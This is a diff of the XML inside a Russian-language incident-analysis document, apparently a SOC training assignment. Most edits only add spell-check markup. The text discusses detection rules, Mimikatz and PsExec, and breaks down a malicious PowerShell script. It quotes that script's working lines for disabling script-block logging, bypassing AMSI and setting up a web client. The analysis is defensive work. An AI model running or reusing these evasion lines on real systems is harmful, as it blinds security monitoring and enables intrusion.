+        <w:t xml:space="preserve"> отчет об инциденте, включив в него все шаги расследования, выявленные уязвимости и меры, принятые для устранения проблемы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -777,8 +912,13 @@
         </w:rPr>
         <w:t>Обучение команды</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Провести анализ инцидента с командой для повышения осведомленности и подготовки к предотвращению подобных атак в будущем.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Провести</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> анализ инцидента с командой для повышения осведомленности и подготовки к предотвращению подобных атак в будущем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -949,7 +1089,23 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как Mimikatz.</w:t>
+        <w:t xml:space="preserve">Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Mimikatz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1039,7 +1195,39 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Поиск файлов, связанных с инструментами дампа хэша, в системе (например, Mimikatz, ProcDump).</w:t>
+        <w:t xml:space="preserve">Поиск файлов, связанных с инструментами дампа хэша, в системе (например, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Mimikatz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ProcDump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1260,7 +1448,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Уведомления о странных геолокациях входа</w:t>
+        <w:t xml:space="preserve">Уведомления о странных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>геолокациях</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> входа</w:t>
       </w:r>
       <w:r>
         <w:t>:</w:t>
@@ -1576,7 +1780,15 @@
         <w:t xml:space="preserve">.   </w:t>
       </w:r>
       <w:r>
-        <w:t>Системы SIEM (Security Information and Event Management) могут собирать и анализировать данные из различных источников:</w:t>
+        <w:t xml:space="preserve">Системы SIEM (Security Information </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Event Management) могут собирать и анализировать данные из различных источников:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1631,7 +1843,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Проактивный поиск угроз (Threat Hunting)</w:t>
+        <w:t>Проактивный поиск угроз (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Threat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Hunting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1849,7 +2093,23 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>Если у вас есть журналы антивируса, какие правила корреляции(сценарии обнаружения)вы можете предложить?</w:t>
+        <w:t xml:space="preserve">Если у вас есть журналы антивируса, какие правила </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>корреляции(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>сценарии обнаружения)вы можете предложить?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1899,8 +2159,13 @@
         </w:rPr>
         <w:t xml:space="preserve">    Определение метрик обнаружения</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Установите, какие коды событий и параметры логов можно использовать для детектирования атак. Например, это могут быть события о неудачных попытках входа или о запуске подозрительных процессов</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Установите</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, какие коды событий и параметры логов можно использовать для детектирования атак. Например, это могут быть события о неудачных попытках входа или о запуске подозрительных процессов</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1938,7 +2203,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    Создание правила корреляции: На этом этапе формулируйте конкретные правила, например:</w:t>
+        <w:t xml:space="preserve">    Создание правила корреляции</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: На</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> этом этапе формулируйте конкретные правила, например:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1952,8 +2225,21 @@
         </w:rPr>
         <w:t xml:space="preserve">    Правило для обнаружения использования дефолтных учетных записей</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Срабатывает при входе под учетной записью с известным паролем (например, "admin")</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Срабатывает</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> при входе под учетной записью с известным паролем (например, "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1967,8 +2253,13 @@
         </w:rPr>
         <w:t xml:space="preserve">    Правило для мониторинга изменений конфигурации антивируса</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Обнаруживает изменения в параметрах запуска службы антивирусного ПО</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Обнаруживает</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> изменения в параметрах запуска службы антивирусного ПО</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2027,8 +2318,13 @@
         </w:rPr>
         <w:t>Неудачные попытки входа</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если за 5 минут было более 5 неудачных попыток входа под одной учетной записью, создайте инцидент.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> за 5 минут было более 5 неудачных попыток входа под одной учетной записью, создайте инцидент.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2044,8 +2340,13 @@
         </w:rPr>
         <w:t>Запуск неизвестного процесса</w:t>
       </w:r>
-      <w:r>
-        <w:t>: Если зафиксировано событие запуска неизвестного исполняемого файла после нескольких неудачных попыток входа, это может указывать на атаку.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> зафиксировано событие запуска неизвестного исполняемого файла после нескольких неудачных попыток входа, это может указывать на атаку.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2104,7 +2405,23 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>6.3 На каком этапе атаки «kill chain» находится этот случай?</w:t>
+        <w:t>6.3 На каком этапе атаки «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>» находится этот случай?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2401,7 +2718,35 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Этап атаки «kill chain»:</w:t>
+        <w:t>Этап атаки «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>kill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>chain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>»:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2426,7 +2771,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"Exploitation"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Exploitation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (эксплуатация) или </w:t>
@@ -2436,7 +2797,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"Installation"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Installation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (установка).</w:t>
@@ -2583,7 +2960,48 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>UDP Snd: Это указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских датаграмм).</w:t>
+        <w:t xml:space="preserve">UDP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Snd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>: Это</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>датаграмм</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2679,7 +3097,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Записи журнала делают запросы записей PTR (Pointer) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
+        <w:t>Записи журнала делают запросы записей PTR (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pointer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2825,35 +3251,49 @@
       <w:r>
         <w:t xml:space="preserve">1 и 10 сообщение с компьютера </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>kheirkhabarov</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>avp</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ru</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>о создании(1) и доступе(10) дампа памяти.</w:t>
+        <w:t xml:space="preserve">о </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>создании(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>1) и доступе(10) дампа памяти.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2908,17 +3348,32 @@
       <w:r>
         <w:t xml:space="preserve">это исполняемый файл(программа) удаленного доступа, и это событие создается каждый раз, когда используется </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>PsExec</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, поэтому потребуется дополнительный анализ событий, чтобы определить, являются ли они вредоносными или легитимными</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">, т.к.возможный вредоносный код </w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>т.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>к.возможный</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> вредоносный код </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2994,14 +3449,21 @@
       <w:r>
         <w:t>-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ItemProperty</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">(в </w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3093,7 +3555,35 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Это скрипт PowerShell, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками PowerShell и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
+        <w:t xml:space="preserve">Это скрипт </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3115,8 +3605,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Проверка версии PowerShell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Проверка версии </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3127,7 +3627,77 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> powershell IF ($PSVersionTable.PSVersion.Major -ge 3) { Скрипт проверяет, является ли версия PowerShell 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IF ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PSVersionTable.PSVersion.Major</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>ge</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3) </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>{ Скрипт</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проверяет, является ли версия </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3149,8 +3719,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Манипуляция параметрами групповой политики powershell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Манипуляция параметрами групповой политики </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3163,7 +3743,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $GPF=[REF].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); Эта строка извлекает непубличное статическое поле, которое содержит кэшированные параметры групповой политики. Затем он проверяет, включено ли ведение журнала блоков скриптов, и отключает его. </w:t>
+        <w:t xml:space="preserve"> $GPF=[REF</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>].Assembly.GetType</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); Эта строка извлекает непубличное статическое поле, которое содержит кэшированные параметры групповой политики. Затем он проверяет, включено ли ведение журнала блоков скриптов, и отключает его. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3185,13 +3779,51 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Изменение реестра powershell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов PowerShell, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
+        <w:t xml:space="preserve">Изменение реестра </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>']=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3230,7 +3862,64 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [Ref</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>].</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Assembly.GetType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>System.Management.Automation.AmsiUtils</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3453,8 +4142,18 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Инициализация веб-клиента powershell</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Инициализация веб-клиента </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -3467,14 +4166,112 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $WC=New-Object System.Net.WebClient; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'; $WC.Headers.Add('User-</w:t>
+        <w:t xml:space="preserve"> $WC=New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>System.Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
